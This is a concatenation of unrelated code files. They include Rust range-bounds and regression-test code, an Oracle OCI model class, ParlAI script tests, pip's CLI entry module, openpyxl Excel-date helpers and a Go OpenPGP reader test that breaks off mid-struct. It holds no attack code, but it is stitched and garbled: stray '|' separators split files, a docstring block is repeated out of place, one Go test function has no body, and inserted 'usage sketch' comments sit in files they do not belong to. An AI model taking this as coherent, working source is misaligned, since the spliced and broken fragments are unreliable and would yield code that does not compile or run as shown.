#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeToInclusive<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..={:?}", self.end)
}
}
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
impl<Idx: PartialOrd<Idx>> RangeToInclusive<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (..=5).contains(&-1_000_000_000));
/// assert!( (..=5).contains(&5));
/// assert!(!(..=5).contains(&6));
///
/// assert!( (..=1.0).contains(&1.0));
/// assert!(!(..=1.0).contains(&f32::NAN));
/// assert!(!(..=f32::NAN).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
// RangeToInclusive<Idx> cannot impl From<RangeTo<Idx>>
// because underflow would be possible with (..0).into()
/// An endpoint of a range of keys.
///
/// # Examples
///
/// `Bound`s are range endpoints:
///
/// ```
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((..100).start_bound(), Unbounded);
/// assert_eq!((1..12).start_bound(), Included(&1));
/// assert_eq!((1..12).end_bound(), Excluded(&12));
/// ```
///
/// Using a tuple of `Bound`s as an argument to [`BTreeMap::range`].
/// Note that in most cases, it's better to use range syntax (`1..5`) instead.
///
/// ```
/// use std::collections::BTreeMap;
/// use std::ops::Bound::{Excluded, Included, Unbounded};
///
/// let mut map = BTreeMap::new();
/// map.insert(3, "a");
/// map.insert(5, "b");
/// map.insert(8, "c");
///
/// for (key, value) in map.range((Excluded(3), Included(8))) {
/// println!("{}: {}", key, value);
/// }
///
/// assert_eq!(Some((&3, &"a")), map.range((Unbounded, Included(5))).next());
/// ```
///
/// [`BTreeMap::range`]: ../../std/collections/btree_map/struct.BTreeMap.html#method.range
#[stable(feature = "collections_bound", since = "1.17.0")]
#[derive(Clone, Copy, Debug, Hash, PartialEq, Eq)]
pub enum Bound<T> {
/// An inclusive bound.
#[stable(feature = "collections_bound", since = "1.17.0")]
Included(#[stable(feature = "collections_bound", since = "1.17.0")] T),
/// An exclusive bound.
#[stable(feature = "collections_bound", since = "1.17.0")]
Excluded(#[stable(feature = "collections_bound", since = "1.17.0")] T),
/// An infinite endpoint. Indicates that there is no bound in this direction.
#[stable(feature = "collections_bound", since = "1.17.0")]
Unbounded,
}
#[stable(feature = "collections_range", since = "1.28.0")]
/// `RangeBounds` is implemented by Rust's built-in range types, produced
/// by range syntax like `..`, `a..`, `..b` or `c..d`.
pub trait RangeBounds<T: ?Sized> {
/// Start index bound.
///
/// Returns the start value as a `Bound`.
///
/// # Examples
///
/// ```
/// # fn main() {
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((..10).start_bound(), Unbounded);
/// assert_eq!((3..10).start_bound(), Included(&3));
/// # }
/// ```
#[stable(feature = "collections_range", since = "1.28.0")]
fn start_bound(&self) -> Bound<&T>;
/// End index bound.
///
/// Returns the end value as a `Bound`.
///
/// # Examples
///
/// ```
/// # fn main() {
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((3..).end_bound(), Unbounded);
/// assert_eq!((3..10).end_bound(), Excluded(&10));
/// # }
/// ```
#[stable(feature = "collections_range", since = "1.28.0")]
fn end_bound(&self) -> Bound<&T>;
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (3..5).contains(&4));
/// assert!(!(3..5).contains(&2));
///
/// assert!( (0.0..1.0).contains(&0.5));
/// assert!(!(0.0..1.0).contains(&f32::NAN));
/// assert!(!(0.0..f32::NAN).contains(&0.5));
    /// assert!(!(f32::NAN..1.0).contains(&0.5));
    /// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
fn contains<U>(&self, item: &U) -> bool
where
T: PartialOrd<U>,
U: ?Sized + PartialOrd<T>,
{
(match self.start_bound() {
Included(ref start) => *start <= item,
Excluded(ref start) => *start < item,
Unbounded => true,
})
&&
(match self.end_bound() {
Included(ref end) => item <= *end,
Excluded(ref end) => item < *end,
Unbounded => true,
})
}
}
use self::Bound::{Excluded, Included, Unbounded};
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T: ?Sized> RangeBounds<T> for RangeFull {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeFrom<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeTo<T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Excluded(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for Range<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Excluded(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeInclusive<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Included(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeToInclusive<T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Included(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for (Bound<T>, Bound<T>) {
fn start_bound(&self) -> Bound<&T> {
match *self {
(Included(ref start), _) => Included(start),
(Excluded(ref start), _) => Excluded(start),
(Unbounded, _) => Unbounded,
}
}
fn end_bound(&self) -> Bound<&T> {
match *self {
(_, Included(ref end)) => Included(end),
(_, Excluded(ref end)) => Excluded(end),
(_, Unbounded) => Unbounded,
}
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<'a, T: ?Sized + 'a> RangeBounds<T> for (Bound<&'a T>, Bound<&'a T>) {
fn start_bound(&self) -> Bound<&T> {
self.0
}
fn end_bound(&self) -> Bound<&T> {
self.1
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeFrom<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeTo<&T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Excluded(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for Range<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Excluded(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeInclusive<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Included(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeToInclusive<&T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
    fn end_bound(&self) -> Bound<&T> {
        Included(self.end)
    }
}
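// Hedged usage sketch (not part of the original module): `within` is a
// hypothetical helper illustrating why `RangeBounds` is the common
// abstraction here -- a single generic bound accepts every range form
// above, including `(Bound, Bound)` tuples. Kept as a comment because
// `contains` is still behind the unstable `range_contains` feature:
//
// fn within<T: PartialOrd, R: RangeBounds<T>>(range: R, item: &T) -> bool {
//     range.contains(item)
// }
// assert!( within(1..=5, &5));
// assert!( within((Excluded(1), Unbounded), &2));
// assert!(!within(..3, &3));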
create_digital_assistant_version_details.py
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .create_digital_assistant_details import CreateDigitalAssistantDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateDigitalAssistantVersionDetails(CreateDigitalAssistantDetails):
"""
Properties that are required to create a new version of an existing Digital Assistant.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateDigitalAssistantVersionDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.oda.models.CreateDigitalAssistantVersionDetails.kind` attribute
of this class is ``VERSION`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param kind:
The value to assign to the kind property of this CreateDigitalAssistantVersionDetails.
Allowed values for this property are: "NEW", "CLONE", "VERSION", "EXTEND"
:type kind: str
:param category:
The value to assign to the category property of this CreateDigitalAssistantVersionDetails.
:type category: str
:param description:
The value to assign to the description property of this CreateDigitalAssistantVersionDetails.
:type description: str
:param platform_version:
The value to assign to the platform_version property of this CreateDigitalAssistantVersionDetails.
:type platform_version: str
:param multilingual_mode:
The value to assign to the multilingual_mode property of this CreateDigitalAssistantVersionDetails.
Allowed values for this property are: "NATIVE", "TRANSLATION"
:type multilingual_mode: str
:param primary_language_tag:
The value to assign to the primary_language_tag property of this CreateDigitalAssistantVersionDetails.
:type primary_language_tag: str
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateDigitalAssistantVersionDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateDigitalAssistantVersionDetails.
:type defined_tags: dict(str, dict(str, object))
:param id:
The value to assign to the id property of this CreateDigitalAssistantVersionDetails.
:type id: str
:param version:
The value to assign to the version property of this CreateDigitalAssistantVersionDetails.
:type version: str
"""
        self.swagger_types = {
            'kind': 'str',
'category': 'str',
'description': 'str',
'platform_version': 'str',
'multilingual_mode': 'str',
'primary_language_tag': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'id': 'str',
'version': 'str'
}
self.attribute_map = {
'kind': 'kind',
'category': 'category',
'description': 'description',
'platform_version': 'platformVersion',
'multilingual_mode': 'multilingualMode',
'primary_language_tag': 'primaryLanguageTag',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'id': 'id',
'version': 'version'
}
self._kind = None
self._category = None
self._description = None
self._platform_version = None
self._multilingual_mode = None
self._primary_language_tag = None
self._freeform_tags = None
self._defined_tags = None
self._id = None
self._version = None
self._kind = 'VERSION'
@property
def id(self):
"""
**[Required]** Gets the id of this CreateDigitalAssistantVersionDetails.
The unique identifier of the Digital Assistant to create a new version of.
:return: The id of this CreateDigitalAssistantVersionDetails.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this CreateDigitalAssistantVersionDetails.
The unique identifier of the Digital Assistant to create a new version of.
:param id: The id of this CreateDigitalAssistantVersionDetails.
:type: str
"""
self._id = id
@property
def version(self):
"""
**[Required]** Gets the version of this CreateDigitalAssistantVersionDetails.
The resource's version. The version can only contain numbers, letters, periods, underscores, dashes or spaces. The version must begin with a letter or a number.
:return: The version of this CreateDigitalAssistantVersionDetails.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this CreateDigitalAssistantVersionDetails.
The resource's version. The version can only contain numbers, letters, periods, underscores, dashes or spaces. The version must begin with a letter or a number.
:param version: The version of this CreateDigitalAssistantVersionDetails.
:type: str
"""
self._version = version
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
        return not self == other
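# Hedged usage sketch (not part of the original file): builds the payload for
# creating a new version of an existing Digital Assistant; the OCID below is a
# made-up placeholder. In practice the object is passed to the ODA client's
# create operation, and `kind` is preset to 'VERSION' by __init__.
if __name__ == '__main__':
    details = CreateDigitalAssistantVersionDetails(
        id='ocid1.odadigitalassistant.oc1..exampleuniqueid',
        version='1.1',
        description='Next version of an existing Digital Assistant')
    print(details)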
issue-4366.rs
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// regression test for issue 4366
// ensures that 'use foo::*' doesn't import non-public 'use' statements in the
// module 'foo'
#![feature(globs)]
use m1::*;
mod foo {
pub fn foo() {}
}
mod a {
pub mod b {
use foo::foo;
type bar = int;
}
pub mod sub {
use a::b::*;
fn sub() -> int { foo(); 1 } //~ ERROR: unresolved name `foo`
}
}
mod m1 {
    fn foo() {}
}
fn main() {}
__init__.py
# sping:: pyart
from pidPyart import *
|
repl.py
#!/usr/bin/python3
class Evaluator:
def __init__(self, lexer):
self.__lexer = lexer
    def evaluate(self, line):
return int(next(self.__lexer.tokenize(line)).raw_value)
class REPL:
def __init__(self, read, print, evaluate):
self.__read = read
self.__eval = evaluate
self.__print = print
def loop(self):
while True:
try:
line = self.__read('mm-i> ')
result = self.__eval(line)
self.__print(result)
except KeyboardInterrupt:
break
if __name__ == '__main__':
from lexer import Lexer
REPL(input, print, Evaluator(Lexer()).evaluate).loop()
test_other_scripts.py
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Catch all for a number of "other" scripts.
"""
import os
import unittest
import parlai.utils.testing as testing_utils
class TestConvertToParlaiFormat(unittest.TestCase):
def test_convert(self):
from parlai.scripts.convert_data_to_parlai_format import (
ConvertDataToParlaiFormat,
)
with testing_utils.tempdir() as tmpdir:
fn = os.path.join(tmpdir, 'parlai.txt')
ConvertDataToParlaiFormat.main(
task='integration_tests:nocandidate', outfile=fn
)
with open(fn) as f:
assert (
f.readline() == 'text:4 1 3 2\tlabels:4 1 3 2\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:3 0 4 1\tlabels:3 0 4 1\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:5 1 6 3\tlabels:5 1 6 3\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:4 5 6 2\tlabels:4 5 6 2\tepisode_done:True\n'
)
assert f.readline() == '\n'
assert (
f.readline() == 'text:0 5 3 1\tlabels:0 5 3 1\tepisode_done:True\n'
)
assert f.readline() == '\n'
class TestVerifyData(unittest.TestCase):
def test_verify_data(self):
from parlai.scripts.verify_data import VerifyData
report = VerifyData.main(task='integration_tests')
assert report['did_not_return_message'] == 0
assert report['empty_string_label_candidates'] == 0
assert report['exs'] == 500
assert report['label_candidates_with_missing_label'] == 0
assert report['missing_label_candidates'] == 0
assert report['missing_labels'] == 0
assert report['missing_text'] == 0
class TestVacuum(unittest.TestCase):
def test_vacuum(self):
with testing_utils.tempdir() as tmpdir:
from parlai.scripts.vacuum import Vacuum
model_file = os.path.join(tmpdir, 'model')
valid, test = testing_utils.train_model(
{
'task': 'integration_tests',
'optimizer': 'adam',
'learningrate': 0.01,
'model_file': model_file,
'num_epochs': 0.05,
'skip_generation': True,
'batchsize': 8,
# TODO: switch to test_agents/unigram
'model': 'transformer/generator',
'ffn_size': 32,
'embedding_size': 32,
'n_layers': 1,
}
)
size_before = os.stat(model_file).st_size
Vacuum.main(model_file=model_file)
size_after = os.stat(model_file).st_size
assert size_after < size_before
assert os.path.exists(model_file + '.unvacuumed')
valid2, test2 = testing_utils.eval_model(
{'task': 'integration_tests', 'model_file': model_file, 'batchsize': 8}
)
for key in ['loss', 'exs', 'ppl', 'token_acc']:
assert valid2[key] == valid[key], f"{key} score doesn't match"
assert test2[key] == test[key], f"{key} score doesn't match"
class TestDetectOffensive(unittest.TestCase):
def test_offensive(self):
from parlai.scripts.detect_offensive_language import DetectOffensive
report = DetectOffensive.main(
task='babi:task1k:10', datatype='valid', safety='string_matcher'
)
assert report['string_offenses%'] == 0
assert report['word_offenses'] == 0
assert report['exs'] == 100
class TestParty(unittest.TestCase):
def test_party(self):
from parlai.scripts.party import Party
Party.main(seconds=0.01)
class TestDataStats(unittest.TestCase):
def test_simple(self):
from parlai.scripts.data_stats import DataStats
report = DataStats.main(task='integration_tests')
assert report['both/avg_utterance_length'] == 4
assert report['input/avg_utterance_length'] == 4
assert report['labels/avg_utterance_length'] == 4
assert report['both/tokens'] == 4000
assert report['input/tokens'] == 2000
assert report['labels/tokens'] == 2000
assert report['both/unique_tokens'] == 7
assert report['input/unique_tokens'] == 7
assert report['labels/unique_tokens'] == 7
assert report['both/unique_utterances'] == 500
assert report['input/unique_utterances'] == 500
assert report['labels/unique_utterances'] == 500
assert report['both/utterances'] == 1000
assert report['input/utterances'] == 500
assert report['labels/utterances'] == 500
class TestProfileTrain(unittest.TestCase):
"""
Test profile_train doesn't crash.
"""
def test_cprofile(self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
    def test_torch(self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
torch=True,
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
@testing_utils.skipUnlessGPU
def test_torch_cuda(self):
from parlai.scripts.profile_train import ProfileTrain
with testing_utils.tempdir() as tmpdir:
ProfileTrain.main(
task='integration_tests:overfit',
model='test_agents/unigram',
torch_cuda=True,
model_file=os.path.join(tmpdir, 'model'),
skip_generation=True,
)
class TestTokenStats(unittest.TestCase):
def test_token_stats(self):
from parlai.scripts.token_stats import TokenStats
from parlai.core.metrics import dict_report
results = dict_report(TokenStats.main(task='integration_tests:multiturn'))
assert results == {
'exs': 2000,
'max': 16,
'mean': 7.5,
'min': 1,
'p01': 1,
'p05': 1,
'p10': 1,
'p25': 4,
'p50': 7.5,
'p75': 11.5,
'p90': 16,
'p95': 16,
'p99': 16,
'p@128': 1,
}
server-request.go
package main
import "github.com/truauth/truauth/pkg/pgdb"
// ServiceRequest service request struct used to pass service information.
type ServiceRequest struct {
PGCreds *pgdb.DbCreds
}
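// newServiceRequest is a hedged usage sketch, not part of the original file;
// the helper name is hypothetical. It shows the intended wiring: handlers
// receive a ServiceRequest carrying shared Postgres credentials.
func newServiceRequest(creds *pgdb.DbCreds) *ServiceRequest {
	return &ServiceRequest{PGCreds: creds}
}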
__init__.py
#!/usr/bin/env python
from __future__ import absolute_import
import locale
import logging
import os
import sys
import warnings
# 2016-06-17 barry@debian.org: urllib3 1.14 added optional support for socks,
# but if invoked (i.e. imported), it will issue a warning to stderr if socks
# isn't available. requests unconditionally imports urllib3's socks contrib
# module, triggering this warning. The warning breaks DEP-8 tests (because of
# the stderr output) and is just plain annoying in normal usage. I don't want
# to add socks as yet another dependency for pip, nor do I want to allow-stderr
# in the DEP-8 tests, so just suppress the warning. pdb tells me this has to
# be done before the import of pip.vcs.
from pip._vendor.urllib3.exceptions import DependencyWarning
warnings.filterwarnings("ignore", category=DependencyWarning) # noqa
# We want to inject the use of SecureTransport as early as possible so that any
# references or sessions or what have you are ensured to have it, however we
# only want to do this in the case that we're running on macOS and the linked
# OpenSSL is too old to handle TLSv1.2
try:
import ssl
except ImportError:
pass
else:
# Checks for OpenSSL 1.0.1 on MacOS
if sys.platform == "darwin" and ssl.OPENSSL_VERSION_NUMBER < 0x1000100f:
try:
from pip._vendor.urllib3.contrib import securetransport
except (ImportError, OSError):
pass
else:
securetransport.inject_into_urllib3()
from pip._internal.cli.autocompletion import autocomplete
from pip._internal.cli.main_parser import parse_command
from pip._internal.commands import commands_dict
from pip._internal.exceptions import PipError
from pip._internal.utils import deprecation
from pip._vendor.urllib3.exceptions import InsecureRequestWarning
logger = logging.getLogger(__name__)
# Hide the InsecureRequestWarning from urllib3
warnings.filterwarnings("ignore", category=InsecureRequestWarning)
def main(args=None):
    if args is None:
args = sys.argv[1:]
# Configure our deprecation warnings to be sent through loggers
deprecation.install_warning_logger()
autocomplete()
try:
cmd_name, cmd_args = parse_command(args)
except PipError as exc:
sys.stderr.write("ERROR: %s" % exc)
sys.stderr.write(os.linesep)
sys.exit(1)
# Needed for locale.getpreferredencoding(False) to work
# in pip._internal.utils.encoding.auto_decode
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error as e:
# setlocale can apparently crash if locale are uninitialized
logger.debug("Ignoring error %s when setting locale", e)
command = commands_dict[cmd_name](isolated=("--isolated" in cmd_args))
    return command.main(cmd_args)
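# Hedged sketch (not part of the excerpt): how this entry point is wired up
# when the module is executed directly. pip's internals are not a supported
# programmatic API; this only illustrates the parse_command -> command.main
# flow above.
if __name__ == '__main__':
    sys.exit(main())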
|
datetime.py
from __future__ import absolute_import
from __future__ import division
# Copyright (c) 2010-2015 openpyxl
"""Manage Excel date weirdness."""
# Python stdlib imports
import datetime
from datetime import timedelta, tzinfo
import re
from jdcal import (
gcal2jd,
jd2gcal,
MJD_0
)
from openpyxl.compat import lru_cache
# constants
MAC_EPOCH = datetime.date(1904, 1, 1)
WINDOWS_EPOCH = datetime.date(1899, 12, 30)
CALENDAR_WINDOWS_1900 = sum(gcal2jd(WINDOWS_EPOCH.year, WINDOWS_EPOCH.month, WINDOWS_EPOCH.day))
CALENDAR_MAC_1904 = sum(gcal2jd(MAC_EPOCH.year, MAC_EPOCH.month, MAC_EPOCH.day))
SECS_PER_DAY = 86400
EPOCH = datetime.datetime.utcfromtimestamp(0)
W3CDTF_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
W3CDTF_REGEX = re.compile(r'(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})(.(\d{2}))?Z?')
def datetime_to_W3CDTF(dt):
"""Convert from a datetime to a timestamp string."""
return datetime.datetime.strftime(dt, W3CDTF_FORMAT)
def W3CDTF_to_datetime(formatted_string):
"""Convert from a timestamp string to a datetime object."""
match = W3CDTF_REGEX.match(formatted_string)
dt = [int(v) for v in match.groups()[:6]]
return datetime.datetime(*dt)
@lru_cache()
def to_excel(dt, offset=CALENDAR_WINDOWS_1900):
jul = sum(gcal2jd(dt.year, dt.month, dt.day)) - offset
if jul <= 60 and offset == CALENDAR_WINDOWS_1900:
jul -= 1
if hasattr(dt, 'time'):
jul += time_to_days(dt)
return jul
@lru_cache()
def from_excel(value, offset=CALENDAR_WINDOWS_1900):
if value is None:
return
if 1 < value < 60 and offset == CALENDAR_WINDOWS_1900:
value += 1
parts = list(jd2gcal(MJD_0, value + offset - MJD_0))
_, fraction = divmod(value, 1)
jumped = (parts[-1] == 0 and fraction > 0)
diff = datetime.timedelta(days=fraction)
if 0 < abs(value) < 1:
return days_to_time(diff)
if not jumped:
return datetime.datetime(*parts[:3]) + diff
else:
return datetime.datetime(*parts[:3] + [0])
class GMT(tzinfo):
def utcoffset(self, dt):
return timedelta(0)
def dst(self, dt):
return timedelta(0)
    def tzname(self, dt):
return "GMT"
try:
from datetime import timezone
UTC = timezone(timedelta(0))
except ImportError:
# Python 2.6
UTC = GMT()
@lru_cache()
def time_to_days(value):
    """Convert a time value to fractions of day"""
    if value.tzinfo is not None:
        value = value.astimezone(UTC)
    return (
        (value.hour * 3600)
        + (value.minute * 60)
        + value.second
        + value.microsecond / 10**6
    ) / SECS_PER_DAY
@lru_cache()
def timedelta_to_days(value):
"""Convert a timedelta value to fractions of a day"""
if not hasattr(value, 'total_seconds'):
secs = (value.microseconds +
(value.seconds + value.days * SECS_PER_DAY) * 10**6) / 10**6
else:
        secs = value.total_seconds()
return secs / SECS_PER_DAY
@lru_cache()
def days_to_time(value):
mins, seconds = divmod(value.seconds, 60)
hours, mins = divmod(mins, 60)
return datetime.time(hours, mins, seconds, value.microseconds)
| """Convert a time value to fractions of day"""
if value.tzinfo is not None:
value = value.astimezone(UTC)
return (
(value.hour * 3600)
+ (value.minute * 60)
+ value.second
+ value.microsecond / 10**6
) / SECS_PER_DAY |
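# Hedged worked example (not part of the original module): round-tripping a
# datetime through a Windows-epoch Excel serial. 2010-01-01 is serial 40179.0;
# the `jul <= 60` adjustment in to_excel/from_excel absorbs Excel's phantom
# 1900-02-29 for serials at or below 60.
if __name__ == '__main__':
    dt = datetime.datetime(2010, 1, 1)
    serial = to_excel(dt)
    assert serial == 40179.0
    assert from_excel(serial) == dt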
read_test.go
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package openpgp
import (
"bytes"
_ "crypto/sha512"
"encoding/hex"
"io"
"io/ioutil"
"strings"
"testing"
"github.com/eyupsaral/crypto/openpgp/armor"
"github.com/eyupsaral/crypto/openpgp/errors"
)
func readerFromHex(s string) io.Reader {
data, err := hex.DecodeString(s)
if err != nil {
panic("readerFromHex: bad input")
}
return bytes.NewBuffer(data)
}
func TestReadKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2Hex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 2 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB || uint32(kring[1].PrimaryKey.KeyId) != 0x1E35246B {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestRereadKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2Hex))
if err != nil {
t.Errorf("error in initial parse: %s", err)
return
}
out := new(bytes.Buffer)
err = kring[0].Serialize(out)
if err != nil {
t.Errorf("error in serialization: %s", err)
return
}
kring, err = ReadKeyRing(out)
if err != nil {
t.Errorf("error in second parse: %s", err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestReadPrivateKeyRing(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(testKeys1And2PrivateHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 2 || uint32(kring[0].PrimaryKey.KeyId) != 0xC20C31BB || uint32(kring[1].PrimaryKey.KeyId) != 0x1E35246B || kring[0].PrimaryKey == nil {
t.Errorf("bad keyring: %#v", kring)
}
}
func TestReadDSAKey(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(dsaTestKeyHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0x0CCC0360 {
t.Errorf("bad parse: %#v", kring)
}
}
func TestReadP256Key(t *testing.T) {
kring, err := ReadKeyRing(readerFromHex(p256TestKeyHex))
if err != nil {
t.Error(err)
return
}
if len(kring) != 1 || uint32(kring[0].PrimaryKey.KeyId) != 0x5918513E {
t.Errorf("bad parse: %#v", kring)
}
}
func TestDSAHashTruncatation(t *testing.T) |
func TestGetKeyById(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
keys := kring.KeysById(0xa34d7e18c20c31bb)
if len(keys) != 1 || keys[0].Entity != kring[0] {
t.Errorf("bad result for 0xa34d7e18c20c31bb: %#v", keys)
}
keys = kring.KeysById(0xfd94408d4543314f)
if len(keys) != 1 || keys[0].Entity != kring[0] {
t.Errorf("bad result for 0xa34d7e18c20c31bb: %#v", keys)
}
}
func checkSignedMessage(t *testing.T, signedHex, expected string) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
md, err := ReadMessage(readerFromHex(signedHex), kring, nil, nil)
if err != nil {
t.Error(err)
return
}
if !md.IsSigned || md.SignedByKeyId != 0xa34d7e18c20c31bb || md.SignedBy == nil || md.IsEncrypted || md.IsSymmetricallyEncrypted || len(md.EncryptedToKeyIds) != 0 || md.DecryptedWith != (Key{}) {
t.Errorf("bad MessageDetails: %#v", md)
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("error reading UnverifiedBody: %s", err)
}
if string(contents) != expected {
t.Errorf("bad UnverifiedBody got:%s want:%s", string(contents), expected)
}
if md.SignatureError != nil || md.Signature == nil {
t.Errorf("failed to validate: %s", md.SignatureError)
}
}
func TestSignedMessage(t *testing.T) {
checkSignedMessage(t, signedMessageHex, signedInput)
}
func TestTextSignedMessage(t *testing.T) {
checkSignedMessage(t, signedTextMessageHex, signedTextInput)
}
// The reader should detect "compressed quines", which are compressed
// packets that expand into themselves and cause an infinite recursive
// parsing loop.
// The packet in this test case comes from Taylor R. Campbell at
// http://mumble.net/~campbell/misc/pgp-quine/
func TestCampbellQuine(t *testing.T) {
md, err := ReadMessage(readerFromHex(campbellQuine), nil, nil, nil)
if md != nil {
t.Errorf("Reading a compressed quine should not return any data: %#v", md)
}
structural, ok := err.(errors.StructuralError)
if !ok {
t.Fatalf("Unexpected class of error: %T", err)
}
if !strings.Contains(string(structural), "too many layers of packets") {
t.Fatalf("Unexpected error: %s", err)
}
}
var signedEncryptedMessageTests = []struct {
keyRingHex string
messageHex string
signedByKeyId uint64
encryptedToKeyId uint64
}{
{
testKeys1And2PrivateHex,
signedEncryptedMessageHex,
0xa34d7e18c20c31bb,
0x2a67d68660df41c7,
},
{
